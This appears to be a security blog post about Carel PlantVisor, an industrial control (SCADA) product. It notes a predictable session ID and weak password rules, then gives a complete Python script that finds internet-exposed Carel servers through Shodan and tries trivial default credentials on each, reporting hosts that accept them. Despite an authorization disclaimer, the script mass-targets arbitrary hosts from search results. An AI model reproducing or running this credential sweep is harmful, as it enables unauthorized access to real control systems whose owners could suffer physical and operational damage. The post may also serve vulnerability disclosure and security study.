Carel: One small step further
DISCLAIMER: This information is quite old, but I recently created a GitHub account and wanted to use it for the first time, so I have taken a random project from my hard disk :-P
Some time ago one more SCADA system showed its lack of security. Several vulnerabilities in Carel PlantVisor were published by people like Luigi Auriemma, and others, like the Hispasec guys and myself, enjoyed playing with these first-level wargame systems.
In addition to the vulnerabilities already exposed, I could see (at least) two other attack vectors:
- The session ID (SessionID) used to track authentication is totally predictable and appears to depend on the client's IP address. This means it would be possible to reach privileged functions if an admin is logged in at the same time and shares our IP (NAT, etc.), or if the Carel PlantVisor server sits behind a reverse proxy or load balancer (every client then arrives from the proxy's address).
- There are plenty of trivial passwords out there! The application doesn't enforce any password strength. To find this low-hanging fruit I developed a little Python script that searches for Carel servers in Shodan (you need a Shodan API key) and tests weak passwords. Of course, this script was developed to test the security of authorized infrastructures, and it must not be used without the permission of the server administrator/owner.
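The sketch below shows how such a sweep can be structured; it is an added example written for this page, not the script from the repository. The Shodan REST search endpoint and the shape of its JSON (`matches`, `ip_str`, `port`) are real, but the search query "Carel", the login path, the form field names, the success marker and the credential list are assumptions you must replace with values taken from a capture of the real application. The login function is passed in as a parameter so the sweep logic can be exercised against a fake before it is ever pointed at a live host.

```python
"""Weak-credential sweep for hosts found via Shodan (added example, not the repo's script).

Assumptions, marked in the code: the query string, the login path/fields and the
success marker are HYPOTHETICAL placeholders; WEAK_CREDS is a constructed list.
"""
import json
import os
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Iterator, List, Tuple

# Real Shodan search endpoint; the key comes from the environment, never from the code.
SHODAN_SEARCH_URL = "https://api.shodan.io/shodan/host/search"
SHODAN_QUERY = "Carel"  # assumption: adjust to whatever the real banners contain

# HYPOTHETICAL login form: set these from a captured login of the real application.
LOGIN_PATH = "/login"
USER_FIELD = "username"
PASS_FIELD = "password"
LOGIN_OK_MARKER = "logout"  # assumption: text only shown after a successful login

# Constructed list of the trivial passwords the text describes.
WEAK_CREDS: List[Tuple[str, str]] = [
    ("admin", "admin"), ("admin", "1234"), ("admin", ""), ("carel", "carel"), ("user", "user"),
]

Host = Tuple[str, int]
LoginFn = Callable[[str, int, str, str], bool]


def shodan_search(api_key: str, query: str = SHODAN_QUERY, page: int = 1) -> dict:
    """One page of Shodan search results as the raw JSON dict."""
    params = urllib.parse.urlencode({"key": api_key, "query": query, "page": page})
    with urllib.request.urlopen(f"{SHODAN_SEARCH_URL}?{params}", timeout=30) as resp:
        return json.load(resp)


def hosts_from_shodan(result: dict) -> Iterator[Host]:
    """Yield (ip, port) pairs from a Shodan result, skipping incomplete matches."""
    for match in result.get("matches", []):
        ip, port = match.get("ip_str"), match.get("port")
        if ip and port:
            yield ip, int(port)


def try_login_http(host: str, port: int, user: str, password: str, timeout: float = 10.0) -> bool:
    """POST the hypothetical login form; True only if the success marker comes back."""
    url = f"http://{host}:{port}{LOGIN_PATH}"
    data = urllib.parse.urlencode({USER_FIELD: user, PASS_FIELD: password}).encode()
    try:
        with urllib.request.urlopen(urllib.request.Request(url, data=data), timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace").lower()
            return LOGIN_OK_MARKER in body
    except (urllib.error.URLError, OSError):
        return False  # unreachable or unexpected host: treat as "no hit", not as an error


def sweep(hosts: Iterable[Host], creds: Iterable[Tuple[str, str]],
          try_login: LoginFn, delay: float = 1.0) -> List[Tuple[str, int, str, str]]:
    """Try each credential pair per host; stop at the first hit so a controller is not hammered."""
    findings = []
    cred_list = list(creds)
    for host, port in hosts:
        for user, password in cred_list:
            if try_login(host, port, user, password):
                findings.append((host, port, user, password))
                break
            if delay:
                time.sleep(delay)  # be gentle: these are control systems, and lockouts may exist
    return findings


if __name__ == "__main__":
    key = os.environ.get("SHODAN_API_KEY")
    if not key:
        sys.exit("set SHODAN_API_KEY (and only run against hosts you are authorized to test)")
    hosts = list(hosts_from_shodan(shodan_search(key)))
    for host, port, user, password in sweep(hosts, WEAK_CREDS, try_login_http):
        print(f"{host}:{port} accepts {user!r}/{password!r}")
```

Because `sweep` takes the login function as an argument, the loop can be checked offline with a fake that only "accepts" a known pair, and the real `try_login_http` is swapped in only once the form details have been confirmed against an authorized target.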